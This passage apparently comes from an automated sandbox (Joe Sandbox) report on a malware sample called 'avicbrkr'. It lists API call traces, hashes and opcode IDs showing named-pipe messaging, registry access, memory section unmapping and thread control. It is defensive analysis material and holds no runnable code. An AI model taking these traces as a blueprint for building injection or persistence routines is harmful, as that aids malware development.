                        • Part of subcall function 0037C038: memcpy.NTDLL(00000010,?,00000000,?,?,?,0037D428,00000125), ref: 0037C0B4
                        • Part of subcall function 0037C038: memcpy.NTDLL(00000010,00000000,0037D428,?,?,?,0037D428), ref: 0037C0CF
                        • Part of subcall function 0037C038: CallNamedPipeA.KERNEL32(00000000,00000004,?,00000010,00000119,00000001), ref: 0037C0ED
                        • Part of subcall function 0037C038: GetLastError.KERNEL32(?,?,?,0037D428), ref: 0037C0F7
                        • Part of subcall function 0037C038: HeapFree.KERNEL32(00000000,00000000), ref: 0037C11D
                        • Part of subcall function 0037C12C: GetLastError.KERNEL32(000000FF,00000008,?,000000FF,0039D244,?,?,00373DFB,0000012B,0039D244,?,?,?,00373E29,00000000,00000000), ref: 0037C16C
                        • Part of subcall function 0037C12C: CloseHandle.KERNEL32(000000FF), ref: 0037C177
                      • HeapFree.KERNEL32(00000000,00000000,0000010D), ref: 00373ABC
                      • HeapFree.KERNEL32(00000000,?,0039E1D3), ref: 00373ADE
                      • RtlAllocateHeap.NTDLL(00000000,00000400,?), ref: 00373AF9
                      • wsprintfA.USER32 ref: 00373B09
                      Memory Dump Source
                      • Source File: 00000010.00000002.1216935262.00371000.00000020.sdmp, Offset: 00371000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_16_2_371000_avicbrkr.jbxd
                      Similarity
                      • API ID: Heap$Free$Allocate$Trimlstrlenmemcpy$Close$CountCriticalErrorLastSectionTickwsprintf$CallEnterHandleLeaveNamedPipeQueryValue_struprmemset
                      • String ID:
                      • API String ID: 100172519-0
                      • Opcode ID: 34fd7178909c5aad6f807945eb7a4de8b41c6cb5b83b9f5bdbf3e240e5901e89
                      • Instruction ID: b6c0765a409b2c84551c8bcce5c2be3d21f58ade9c2690152ae185c89a8e61c6
                      • Opcode Fuzzy Hash: 34fd7178909c5aad6f807945eb7a4de8b41c6cb5b83b9f5bdbf3e240e5901e89
                      • Instruction Fuzzy Hash: 3C517A72900219BFDF22EF94CC85DAEBB7DEB09340F11446AF605A2250D7795E81EBA0
                      Uniqueness

                      Uniqueness Score: -1,00%

                      APIs
                        • Part of subcall function 00373D02: HeapFree.KERNEL32(00000000,?,?), ref: 00373D85
                      • lstrlen.KERNEL32(?,?,?,00000001), ref: 00372173
                      • RtlAllocateHeap.NTDLL(00000000,?,?), ref: 00372195
                      • lstrcpy.KERNEL32(00000020,?), ref: 003721B4
                      • lstrlen.KERNEL32(?), ref: 003721BE
                      • memcpy.NTDLL(?,?,?), ref: 003721FF
                      • memcpy.NTDLL(?,?,?), ref: 00372212
                      • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 00372255
                        • Part of subcall function 0037C038: lstrlen.KERNEL32(?,00000000,?,?,?,?,?,0037D428,00000125,?,00000004,00000000), ref: 0037C068
                        • Part of subcall function 0037C038: RtlAllocateHeap.NTDLL(00000000,00000004,00000000), ref: 0037C07E
                        • Part of subcall function 0037C038: memcpy.NTDLL(00000010,?,00000000,?,?,?,0037D428,00000125), ref: 0037C0B4
                        • Part of subcall function 0037C038: memcpy.NTDLL(00000010,00000000,0037D428,?,?,?,0037D428), ref: 0037C0CF
                        • Part of subcall function 0037C038: CallNamedPipeA.KERNEL32(00000000,00000004,?,00000010,00000119,00000001), ref: 0037C0ED
                        • Part of subcall function 0037C038: GetLastError.KERNEL32(?,?,?,0037D428), ref: 0037C0F7
                        • Part of subcall function 0037C038: HeapFree.KERNEL32(00000000,00000000), ref: 0037C11D
                      • SwitchToThread.KERNEL32(?,00000000,?,?), ref: 00372236
                        • Part of subcall function 00372C81: memset.NTDLL ref: 00372CE9
                        • Part of subcall function 00372C81: CloseHandle.KERNEL32(?), ref: 00372D32
                        • Part of subcall function 00372C81: HeapFree.KERNEL32(00000000,?,?), ref: 00372EEC
                        • Part of subcall function 00372C81: GetLastError.KERNEL32(?,00000000,?), ref: 003731DA
                      • HeapFree.KERNEL32(00000000,?,?), ref: 0037227B
                      • HeapFree.KERNEL32(00000000,?,?), ref: 00372297
                      Memory Dump Source
                      • Source File: 00000010.00000002.1216935262.00371000.00000020.sdmp, Offset: 00371000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_16_2_371000_avicbrkr.jbxd
                      Similarity
                      • API ID: Heap$Free$memcpy$lstrlen$AllocateErrorLast$CallCloseHandleNamedPipeSwitchThreadlstrcpymemset
                      • String ID:
                      • API String ID: 1768699481-0
                      • Opcode ID: 04b900274c3a285713132bfe98f5d90173ae09ecbef950726d7656ad902a8b57
                      • Instruction ID: 55ffb8fb11d638fa85c218a293d12919192767e0acc220b04c274032fe40fa58
                      • Opcode Fuzzy Hash: 04b900274c3a285713132bfe98f5d90173ae09ecbef950726d7656ad902a8b57
                      • Instruction Fuzzy Hash: 22518A32508301AFC722DF25DC45B5BBBE8FF88314F04892EF599922A0E739D945CB92
                      Uniqueness

                      Uniqueness Score: -1,00%

                      APIs
                      • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 0037BEC2
                      • ConnectNamedPipe.KERNEL32(?,?), ref: 0037BEF2
                      • GetLastError.KERNEL32 ref: 0037BEFC
                      • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 0037BF20
                        • Part of subcall function 0037BC67: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,00000001,00000000,0037BD73,00000008,?,00000010,00000001,00000000,0000012B), ref: 0037BC86
                        • Part of subcall function 0037BC67: WriteFile.KERNEL32(?,00000001,?,?,?), ref: 0037BCBA
                        • Part of subcall function 0037BC67: ReadFile.KERNEL32(?,00000001,?,?,?), ref: 0037BCC2
                        • Part of subcall function 0037BC67: GetLastError.KERNEL32 ref: 0037BCCC
                        • Part of subcall function 0037BC67: WaitForMultipleObjects.KERNEL32(00000002,00000000,00000000,00002710), ref: 0037BCE8
                        • Part of subcall function 0037BC67: GetOverlappedResult.KERNEL32(?,?,?,00000000), ref: 0037BD01
                        • Part of subcall function 0037BC67: CancelIo.KERNEL32(?), ref: 0037BD16
                        • Part of subcall function 0037BC67: CloseHandle.KERNEL32(?), ref: 0037BD26
                        • Part of subcall function 0037BC67: GetLastError.KERNEL32 ref: 0037BD2E
                      • CloseHandle.KERNEL32(?), ref: 0037BF8E
                        • Part of subcall function 0037BE02: RtlAllocateHeap.NTDLL(00000000,?), ref: 0037BE20
                        • Part of subcall function 0037BE02: HeapFree.KERNEL32(00000000,00000000), ref: 0037BE74
                      • FlushFileBuffers.KERNEL32(?), ref: 0037BF63
                      • DisconnectNamedPipe.KERNEL32(?,?,?,00000010,00000000), ref: 0037BF6C
                      • WaitForSingleObject.KERNEL32(0039D29C,00000000), ref: 0037BF79
                      • GetLastError.KERNEL32 ref: 0037BF9B
                      • CloseHandle.KERNEL32(?), ref: 0037BFA8
                      Memory Dump Source
                      • Source File: 00000010.00000002.1216935262.00371000.00000020.sdmp, Offset: 00371000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_16_2_371000_avicbrkr.jbxd
                      Similarity
                      • API ID: ErrorLast$CloseFileHandleWait$CreateEventHeapMultipleNamedObjectsPipe$AllocateBuffersCancelConnectDisconnectFlushFreeObjectOverlappedReadResultSingleWrite
                      • String ID:
                      • API String ID: 3492400467-0
                      • Opcode ID: 8cc66055c7aa90489f46bcefd6fe6a8763e19bbe663bf5c595f185c0b6011f2a
                      • Instruction ID: c61e84df5fcf9921354317327175be79fd1dbf71d14c94f24453691fb4d04adb
                      • Opcode Fuzzy Hash: 8cc66055c7aa90489f46bcefd6fe6a8763e19bbe663bf5c595f185c0b6011f2a
                      • Instruction Fuzzy Hash: FD318371118305AFD7129F78DC4996BB7BCFB48324F108A2AF569D21A0D7358D058F92
                      Uniqueness

                      Uniqueness Score: -1,00%

                      APIs
                      • SetEvent.KERNEL32(?,00371F20,?,0039D270,?,00000000,003713EB), ref: 0038BA1B
                        • Part of subcall function 0038B129: InterlockedExchange.KERNEL32(003713EB,000000FF), ref: 0038B130
                      • WaitForSingleObject.KERNEL32(?,000000FF), ref: 0038BA35
                      • CloseHandle.KERNEL32(?), ref: 0038BA3E
                      • CloseHandle.KERNEL32(?), ref: 0038BA4C
                      • RtlEnterCriticalSection.NTDLL(00000008), ref: 0038BA58
                      • RtlLeaveCriticalSection.NTDLL(00000008), ref: 0038BA81
                      • Sleep.KERNEL32(000001F4), ref: 0038BA90
                      • CloseHandle.KERNEL32(?), ref: 0038BA9D
                      • LocalFree.KERNEL32(?), ref: 0038BAAB
                      • RtlDeleteCriticalSection.NTDLL(00000008), ref: 0038BAB5
                        • Part of subcall function 003712FF: HeapFree.KERNEL32(00000000,?,0038BAC1), ref: 0037130B
                      Memory Dump Source
                      • Source File: 00000010.00000002.1216935262.00371000.00000020.sdmp, Offset: 00371000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_16_2_371000_avicbrkr.jbxd
                      Similarity
                      • API ID: CloseCriticalHandleSection$Free$DeleteEnterEventExchangeHeapInterlockedLeaveLocalObjectSingleSleepWait
                      • String ID:
                      • API String ID: 923018795-0
                      • Opcode ID: cd70977d81622420ee915f7657b3e2ada7f42eca7705f8fe204ae9232631ccdf
                      • Instruction ID: a8fd6040fd00a69fa2c637fcdd35f363c288325f236f80ec27fb67c084610ba6
                      • Opcode Fuzzy Hash: cd70977d81622420ee915f7657b3e2ada7f42eca7705f8fe204ae9232631ccdf
                      • Instruction Fuzzy Hash: 291149315147169BCB33BF69DC48A5BB7FDFF04701B05499AF692826A1CB3AE900CB60
                      Uniqueness

                      Uniqueness Score: -1,00%

                      APIs
                      • RtlAllocateHeap.NTDLL ref: 0037DFF5
                      • memset.NTDLL ref: 0037E009
                        • Part of subcall function 00373E0D: RegQueryValueExA.KERNEL32(00000000,0037D7B1,00000000,0037D7B1,00000000,?,00000000,00000000,00000000,00000000,00000000,?,?,?,00374EBE,0039E1C6), ref: 00373E45
                        • Part of subcall function 00373E0D: RtlAllocateHeap.NTDLL(00000000,?), ref: 00373E59
                        • Part of subcall function 00373E0D: HeapFree.KERNEL32(00000000,?), ref: 00373E8F
                        • Part of subcall function 00373E0D: RegCloseKey.ADVAPI32(00000000,?,?,?,00374EBE,0039E1C6,0037D7B1,00000000,00000000,00000000,00000000,?,?,?,0037D7B1,00000000), ref: 00373E9D
                      • GetCurrentThreadId.KERNEL32(?,00001000,00001000,?), ref: 0037E098
                      • GetCurrentThread.KERNEL32 ref: 0037E0AB
                        • Part of subcall function 0038CF9B: memcpy.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0038D0D1
                        • Part of subcall function 0038CF9B: memcpy.NTDLL(?,?,00000018,?,?,?,?,?,?,?,?,?,00000000), ref: 0038D122
                        • Part of subcall function 0038CF9B: memcpy.NTDLL(?,0038DC33,00000800,?,?,00000000), ref: 0038D192
                        • Part of subcall function 0038CF9B: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 0038D1CD
                        • Part of subcall function 0038CF9B: RtlNtStatusToDosError.NTDLL(00000000), ref: 0038D1D4
                        • Part of subcall function 0038CF9B: CloseHandle.KERNEL32(00000000), ref: 0038D1E3
                        • Part of subcall function 0038CF9B: memset.NTDLL ref: 0038D1F7
                      • RtlEnterCriticalSection.NTDLL(0039D43C), ref: 0037E14E
                      • Sleep.KERNEL32(0000000A), ref: 0037E158
                      • RtlLeaveCriticalSection.NTDLL(0039D43C), ref: 0037E17E
                        • Part of subcall function 0037DF75: NtUnmapViewOfSection.NTDLL(000001F4), ref: 0037DF9E
                        • Part of subcall function 0037DF75: RtlNtStatusToDosError.NTDLL(00000000), ref: 0037DFA5
                        • Part of subcall function 0037DF75: HeapFree.KERNEL32(00000000,00000000,000001F4), ref: 0037DFB4
                      Strings
                      Memory Dump Source
                      • Source File: 00000010.00000002.1216935262.00371000.00000020.sdmp, Offset: 00371000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_16_2_371000_avicbrkr.jbxd
                      Similarity
                      • API ID: HeapSection$memcpy$AllocateCloseCriticalCurrentErrorFreeStatusThreadUnmapViewmemset$EnterHandleLeaveQuerySleepValue
                      • String ID: pnls
                      • API String ID: 168089739-141991303
                      • Opcode ID: c712d47790550c9bb3e5aab333b9d383741bb485e9cd2230ed91e058cb3388db
                      • Instruction ID: 5eae6eb5a2769c3a1627e2bd2364fb459b3ceffa98e7858ad66ed54feaf7dd9d
                      • Opcode Fuzzy Hash: c712d47790550c9bb3e5aab333b9d383741bb485e9cd2230ed91e058cb3388db
                      • Instruction Fuzzy Hash: 435149B1904302AFD712EF68DC8691ABBE9FB4C300F40496EF598D7260D739D9488B92
                      Uniqueness

                      Uniqueness Score: -1,00%

                      APIs
                        • Part of subcall function 003712EA: RtlAllocateHeap.NTDLL(00000000,00000000,00388635), ref: 003712F6
                      • memset.NTDLL ref: 00389BB1
                      • StrTrimA.SHLWAPI(?,003973F4), ref: 00389C12
                      • _strupr.NTDLL ref: 00389C38
                      • StrTrimA.SHLWAPI(?,?), ref: 00389C45
                      • StrTrimA.SHLWAPI(00000001,003973F4), ref: 00389C31
                        • Part of subcall function 00371314: RtlReAllocateHeap.NTDLL(00000000,00000000,00000000,0038BD54), ref: 00371324
                      • memcpy.NTDLL(00000000,00000000,-00000008,-00000020,00000000,-00000020), ref: 00389C8D
                        • Part of subcall function 003712FF: HeapFree.KERNEL32(00000000,?,0038BAC1), ref: 0037130B
                      • lstrlen.KERNEL32(?,00000000,?,?,?,00000001,?,00000000,?), ref: 00389CAC
                      Strings
                      Memory Dump Source
                      • Source File: 00000010.00000002.1216935262.00371000.00000020.sdmp, Offset: 00371000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_16_2_371000_avicbrkr.jbxd
                      Similarity
                      • API ID: HeapTrim$Allocate$Free_struprlstrlenmemcpymemset
                      • String ID: pnls
                      • API String ID: 823183657-141991303
                      • Opcode ID: 7b2be427cb99386164858d3eb78390a269cdbfda553de9f5ce432a288f7a26ac
                      • Instruction ID: cbd3cba8d5c705dfae7b0385aa833c810c154b4dd239e47dd532b799869b4392
                      • Opcode Fuzzy Hash: 7b2be427cb99386164858d3eb78390a269cdbfda553de9f5ce432a288f7a26ac
                      • Instruction Fuzzy Hash: 5341B2726043069FD722EF29CC85B2BBBECEF58740F05085AF848DB242EB74D9058B61
                      Uniqueness

                      Uniqueness Score: -1,00%

                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000010.00000002.1217259032.00631000.00000020.sdmp, Offset: 00631000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_16_2_631000_avicbrkr.jbxd
                      Similarity
                      • API ID: ErrorLast$File$BuffersCloseFlushHandle
                      • String ID: !Cc
                      • API String ID: 1555849187-3374438881
                      • Opcode ID: 4188291a9d1e2349c4049be7f7b0e9b29018648dafa5be1a9f58e76bff2458d3
                      • Instruction ID: d235e3f11dc3c10c451a4e7252500e67d61605c9ec1e55d5459b02b306638d10
                      • Opcode Fuzzy Hash: 4188291a9d1e2349c4049be7f7b0e9b29018648dafa5be1a9f58e76bff2458d3
                      • Instruction Fuzzy Hash: A4313C71900219FFEB04DFA4CD45EBEBBBAEF48750F108165FA11E62A0D7709E419BA0
                      Uniqueness

                      Uniqueness Score: -1,00%

                      APIs
                      • VirtualAlloc.KERNEL32(00000000,00008000,00003000,00000004), ref: 0038B20A
                      • VirtualAlloc.KERNEL32(00000000,00008000,00003000,00000004), ref: 0038B229
                      • GetLastError.KERNEL32 ref: 0038B3DA
                      • GetLastError.KERNEL32 ref: 0038B45C
                      • SwitchToThread.KERNEL32(?,?,?,?), ref: 0038B4A1
                        • Part of subcall function 0038B129: InterlockedExchange.KERNEL32(003713EB,000000FF), ref: 0038B130
                      • GetLastError.KERNEL32 ref: 0038B4D7
                      • GetLastError.KERNEL32 ref: 0038B4E6
                      • RtlEnterCriticalSection.NTDLL(?), ref: 0038B4F6
                      • RtlLeaveCriticalSection.NTDLL(?), ref: 0038B507
                      Memory Dump Source
                      • Source File: 00000010.00000002.1216935262.00371000.00000020.sdmp, Offset: 00371000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_16_2_371000_avicbrkr.jbxd
                      Similarity
                      • API ID: ErrorLast$AllocCriticalSectionVirtual$EnterExchangeInterlockedLeaveSwitchThread
                      • String ID:
                      • API String ID: 3432991976-0
                      • Opcode ID: d578d527fcf19b5d4611818725b47a5deca027b9e68b6c5c41f6ae7040566000
                      • Instruction ID: 02ae07037b9247c2842d3dd4883fbbd34846ebb99806aaa26fdf466950c8ab64
                      • Opcode Fuzzy Hash: d578d527fcf19b5d4611818725b47a5deca027b9e68b6c5c41f6ae7040566000
                      • Instruction Fuzzy Hash: EBA15DB150030A9FDB32AF62CC85AAABBBDFF08355F11456AF916D22A2D7719D44CF10
                      Uniqueness

                      Uniqueness Score: -1,00%

                      APIs
                        • Part of subcall function 0038E971: RtlEnterCriticalSection.NTDLL(0039D43C), ref: 0038E98D
                        • Part of subcall function 0038E971: RtlLeaveCriticalSection.NTDLL(0039D43C), ref: 0038E9AB
                      • RtlLeaveCriticalSection.NTDLL(0039D43C), ref: 0038F1E9
                        • Part of subcall function 0038EC4C: strcpy.NTDLL ref: 0038EC8A
                        • Part of subcall function 0038EC4C: lstrcat.KERNEL32(00000000,?), ref: 0038EC95
                        • Part of subcall function 0038EC4C: StrTrimA.SHLWAPI(00000000,003994B4), ref: 0038ECB2
                      • StrTrimA.SHLWAPI(00000000,003973F8), ref: 0038F222
                        • Part of subcall function 00389722: lstrcpy.KERNEL32(00000000,?), ref: 0038974D
                        • Part of subcall function 00389722: lstrcat.KERNEL32(00000000,?), ref: 00389758
                      • RtlLeaveCriticalSection.NTDLL(0039D43C), ref: 0038F285
                        • Part of subcall function 003918DD: memset.NTDLL ref: 0039191C
                        • Part of subcall function 003918DD: memcpy.NTDLL(?,00000204,?,00000000,00000000,?,?), ref: 00391929
                      • HeapFree.KERNEL32(00000000,?,00000000), ref: 0038F30A
                        • Part of subcall function 0037E4B7: lstrlen.KERNEL32(?,0039706C,00000000,00397050,?,?,?,?,0039D47C,00000001), ref: 0037E4D7
                        • Part of subcall function 0037E4B7: wsprintfA.USER32 ref: 0037E501
                        • Part of subcall function 0038E8FE: RtlEnterCriticalSection.NTDLL(0039D43C), ref: 0038E90B
                        • Part of subcall function 0038E8FE: Sleep.KERNEL32(0000000A,?,00397044,0038E984,0039D480,00000000,00397050,0038F19B), ref: 0038E915
                        • Part of subcall function 0038E8FE: RtlLeaveCriticalSection.NTDLL(0039D43C), ref: 0038E964
                      • HeapFree.KERNEL32(00000000,?,0039D478), ref: 0038F355
                      • HeapFree.KERNEL32(00000000,00000000,0039F27A), ref: 0038F368
                      • HeapFree.KERNEL32(00000000,00000000,?), ref: 0038F377
                      • HeapFree.KERNEL32(00000000,?), ref: 0038F38D
                      • HeapFree.KERNEL32(00000000,00000000), ref: 0038F39C
                      Memory Dump Source
                      • Source File: 00000010.00000002.1216935262.00371000.00000020.sdmp, Offset: 00371000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_16_2_371000_avicbrkr.jbxd
                      Similarity
                      • API ID: CriticalFreeHeapSection$Leave$EnterTrimlstrcat$Sleeplstrcpylstrlenmemcpymemsetstrcpywsprintf
                      • String ID:
                      • API String ID: 1701921480-0
                      • Opcode ID: cc80babb61f4f6d8b6f7e7a329b3449d90043abd7b90b348bd44c4139c1dc771
                      • Instruction ID: 1c21e9cc7e1617c19ba48402cf4cee84a8f9f7629aa7d23006e4d9d25e598d90
                      • Opcode Fuzzy Hash: cc80babb61f4f6d8b6f7e7a329b3449d90043abd7b90b348bd44c4139c1dc771
                      • Instruction Fuzzy Hash: A5918B76244300EFD703EF69EC46E1ABBADFB48710F05056AF985972B1CB76E8048B55
                      Uniqueness

                      Uniqueness Score: -1,00%

                      APIs
                        • Part of subcall function 00375A17: RtlEnterCriticalSection.NTDLL(0039D508), ref: 00375A1F
                        • Part of subcall function 00375A17: RtlLeaveCriticalSection.NTDLL(0039D508), ref: 00375A34
                        • Part of subcall function 00375A17: InterlockedIncrement.KERNEL32(0000001C), ref: 00375A4D
                      • RtlAllocateHeap.NTDLL(00000000,00000018,0039F241), ref: 0037AF62
                      • memset.NTDLL ref: 0037AF73
                      • lstrcmpi.KERNEL32(?,?), ref: 0037AFB3
                      • RtlAllocateHeap.NTDLL(00000000,?), ref: 0037AFDC
                      • memcpy.NTDLL(00000000,?,?), ref: 0037AFF0
                      • memset.NTDLL ref: 0037AFFD
                      • memcpy.NTDLL(?,?,?,?,00000000,?,00000000,?,?), ref: 0037B016
                      • memcpy.NTDLL(-00000005,0039E3F8,00000007,?,?,?,?,00000000,?,00000000,?,?), ref: 0037B031
                      • HeapFree.KERNEL32(00000000,?), ref: 0037B04E
                        • Part of subcall function 00377D93: RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 00377DA7
                        • Part of subcall function 00377D93: memcpy.NTDLL(00000000,00377EC2,?,?,00000008,?,00377EC2,00000000,00000000,?), ref: 00377DD0
                        • Part of subcall function 00377D93: RegCloseKey.ADVAPI32(?,?,00377EC2,00000000,00000000,?,?,?,?,?,?,?,?,00000008,00377A4C,00000000), ref: 00377E22
                        • Part of subcall function 003759AC: InterlockedDecrement.KERNEL32(0000001C), ref: 003759B0
                      Memory Dump Source
                      • Source File: 00000010.00000002.1216935262.00371000.00000020.sdmp, Offset: 00371000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_16_2_371000_avicbrkr.jbxd
                      Similarity
                      • API ID: memcpy$Heap$AllocateCriticalInterlockedSectionmemset$CloseCreateDecrementEnterFreeIncrementLeavelstrcmpi
                      • String ID:
                      • API String ID: 4031990062-0
                      • Opcode ID: 2cdc5d42ea60fe2adfb58a038e7b804446b4a31d5ebd414bf261f0f04d780dca
                      • Instruction ID: 6082471fb20f4239f01e1560b618b28f510d18287dc2892297400f9e888c6b12
                      • Opcode Fuzzy Hash: 2cdc5d42ea60fe2adfb58a038e7b804446b4a31d5ebd414bf261f0f04d780dca
                      • Instruction Fuzzy Hash: F841AC72E00209EFDF229FA0CC85B9EBBB9FB44350F118429F519B7290D7799E449B50
                      Uniqueness

                      Uniqueness Score: -1,00%

                      APIs
                      • RtlImageNtHeader.NTDLL(?), ref: 0037165E
                      • RtlAllocateHeap.NTDLL(00000000,00000011), ref: 00371685
                      • GetTickCount.KERNEL32 ref: 0037169C
                      • wsprintfA.USER32 ref: 003716AC
                      • RegCreateKeyA.ADVAPI32(80000001,0039E2C1,?), ref: 003716E0
                      • StrRChrA.SHLWAPI(00000000,00000000,?), ref: 003716FB
                      • lstrlen.KERNEL32(00000000), ref: 00371705
                      • RegCloseKey.ADVAPI32(?), ref: 00371721
                      • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 0037172F
                      Memory Dump Source
                      • Source File: 00000010.00000002.1216935262.00371000.00000020.sdmp, Offset: 00371000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_16_2_371000_avicbrkr.jbxd
                      Similarity
                      • API ID: Heap$AllocateCloseCountCreateFreeHeaderImageTicklstrlenwsprintf
                      • String ID:
                      • API String ID: 3389039979-0
                      • Opcode ID: a696c51f9e362a2796802a84ec75bfa735c37ac2a56f4c6f51031a98bc853311
                      • Instruction ID: 97258f1cd84ee91f6f1585f65418b066cf97a541feeaae214a69c4b9b88297d7
                      • Opcode Fuzzy Hash: a696c51f9e362a2796802a84ec75bfa735c37ac2a56f4c6f51031a98bc853311
                      • Instruction Fuzzy Hash: B7217C72501258BFDB22AFA4DC88DAF7F7CEF45394F004026F90996260DB768E51DBA0
                      Uniqueness

                      Uniqueness Score: -1,00%

                      APIs
                      • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,00000001,00000000,0037BD73,00000008,?,00000010,00000001,00000000,0000012B), ref: 0037BC86
                      • WriteFile.KERNEL32(?,00000001,?,?,?), ref: 0037BCBA
                      • ReadFile.KERNEL32(?,00000001,?,?,?), ref: 0037BCC2
                      • GetLastError.KERNEL32 ref: 0037BCCC
                      • WaitForMultipleObjects.KERNEL32(00000002,00000000,00000000,00002710), ref: 0037BCE8
                      • GetOverlappedResult.KERNEL32(?,?,?,00000000), ref: 0037BD01
                      • CancelIo.KERNEL32(?), ref: 0037BD16
                      • CloseHandle.KERNEL32(?), ref: 0037BD26
                      • GetLastError.KERNEL32 ref: 0037BD2E
                      Memory Dump Source
                      • Source File: 00000010.00000002.1216935262.00371000.00000020.sdmp, Offset: 00371000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_16_2_371000_avicbrkr.jbxd
                      Similarity
                      • API ID: ErrorFileLast$CancelCloseCreateEventHandleMultipleObjectsOverlappedReadResultWaitWrite
                      • String ID:
                      • API String ID: 4263211335-0
                      • Opcode ID: 04b342186777b058119616f5963b380cda52d31fd2c515f62948fcfcd5c792d9
                      • Instruction ID: 460e30d75f6d2735c95aabee80557010475b2c29ef91d3adcd514e774e144314
                      • Opcode Fuzzy Hash: 04b342186777b058119616f5963b380cda52d31fd2c515f62948fcfcd5c792d9
                      • Instruction Fuzzy Hash: 53217F72900119BFDB239FA4DC48AEEBB7DEF48350F01C426F909D6290D7358A44CBA1
                      Uniqueness

                      Uniqueness Score: -1,00%

                      APIs
                      • PathFindFileNameW.SHLWAPI(0063618C), ref: 00631249
                      • lstrcmpiW.KERNEL32(00000000,?,00637614), ref: 00631250
                      • RegOpenKeyExA.ADVAPI32(80000001,00638080,00000000,00000000,?,?,00637614), ref: 00631281
                      • lstrlenW.KERNEL32(?,00637614), ref: 00631295
                      • RtlAllocateHeap.NTDLL(00000000,?), ref: 006312AD
                      • RegQueryValueExW.ADVAPI32(?,00000000,00637614,00000000,00637614,?,00637614), ref: 006312CC
                      • StrStrIW.SHLWAPI(00000000), ref: 006312E9
                      • HeapFree.KERNEL32(00000000,00000000), ref: 006312FE
                      • RegCloseKey.ADVAPI32(?,?,00637614), ref: 00631307
                      Memory Dump Source
                      • Source File: 00000010.00000002.1217259032.00631000.00000020.sdmp, Offset: 00631000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_16_2_631000_avicbrkr.jbxd
                      Similarity
                      • API ID: Heap$AllocateCloseFileFindFreeNameOpenPathQueryValuelstrcmpilstrlen
                      • String ID:
                      • API String ID: 2182914722-0
                      • Opcode ID: 338cdc7dbcc062b725d000f31414406fdd3e56fcdb0a481d7c88f9b93bd810c8
                      • Instruction ID: 6c74ef4adc72d55aab9491590307b1a3009b43a26e87f27ab9ca50f6f6eaa4d8
                      • Opcode Fuzzy Hash: 338cdc7dbcc062b725d000f31414406fdd3e56fcdb0a481d7c88f9b93bd810c8
                      • Instruction Fuzzy Hash: B8216B71904108BBDB219FA9ED49DABBFBAFF4A300B009068F905D2120DB314A00DBE0
                      Uniqueness

                      Uniqueness Score: -1,00%

                      APIs
                        • Part of subcall function 003747AC: HeapFree.KERNEL32(00000000,0037D9D1), ref: 0037486B
                        • Part of subcall function 003747AC: WaitForSingleObject.KERNEL32(00000000), ref: 003748CF
                        • Part of subcall function 003747AC: HeapFree.KERNEL32(00000000,0037D9D1), ref: 003748F8
                        • Part of subcall function 003747AC: HeapFree.KERNEL32(00000000,0037B7D2), ref: 00374908
                        • Part of subcall function 003747AC: RegCloseKey.ADVAPI32(00000001,?,00000001,0037B7D2,00000000,00000000,?,0037D9D1), ref: 00374911
                        • Part of subcall function 003886D3: lstrlen.KERNEL32(?,00000000,0039CC00,?,00371953,?), ref: 003886DD
                        • Part of subcall function 003886D3: StrRChrA.SHLWAPI(?,00000000,0000002E), ref: 00388708
                        • Part of subcall function 003886D3: lstrcat.KERNEL32(00000000,?), ref: 0038874E
                      • lstrcmp.KERNEL32(?,?), ref: 0037519B
                      • GetCurrentThreadId.KERNEL32(?,?,00000000,?,Function_0000408F,?,00000001), ref: 0037526D
                      • GetCurrentThread.KERNEL32 ref: 0037527E
                        • Part of subcall function 0038CF9B: memcpy.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0038D0D1
                        • Part of subcall function 0038CF9B: memcpy.NTDLL(?,?,00000018,?,?,?,?,?,?,?,?,?,00000000), ref: 0038D122
                        • Part of subcall function 0038CF9B: memcpy.NTDLL(?,0038DC33,00000800,?,?,00000000), ref: 0038D192
                        • Part of subcall function 0038CF9B: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 0038D1CD
                        • Part of subcall function 0038CF9B: RtlNtStatusToDosError.NTDLL(00000000), ref: 0038D1D4
                        • Part of subcall function 0038CF9B: CloseHandle.KERNEL32(00000000), ref: 0038D1E3
                        • Part of subcall function 0038CF9B: memset.NTDLL ref: 0038D1F7
                        • Part of subcall function 0037191A: RegOpenKeyA.ADVAPI32(80000001,?), ref: 0037192E
                        • Part of subcall function 0037191A: RegCloseKey.ADVAPI32(?), ref: 0037195C
                      • RtlAllocateHeap.NTDLL(00000000,00000400,?), ref: 003752DC
                      • wsprintfA.USER32 ref: 003752ED
                      • lstrlen.KERNEL32(00000000,00000000), ref: 003752F8
                        • Part of subcall function 0037C038: lstrlen.KERNEL32(?,00000000,?,?,?,?,?,0037D428,00000125,?,00000004,00000000), ref: 0037C068
                        • Part of subcall function 0037C038: RtlAllocateHeap.NTDLL(00000000,00000004,00000000), ref: 0037C07E
                        • Part of subcall function 0037C038: memcpy.NTDLL(00000010,?,00000000,?,?,?,0037D428,00000125), ref: 0037C0B4
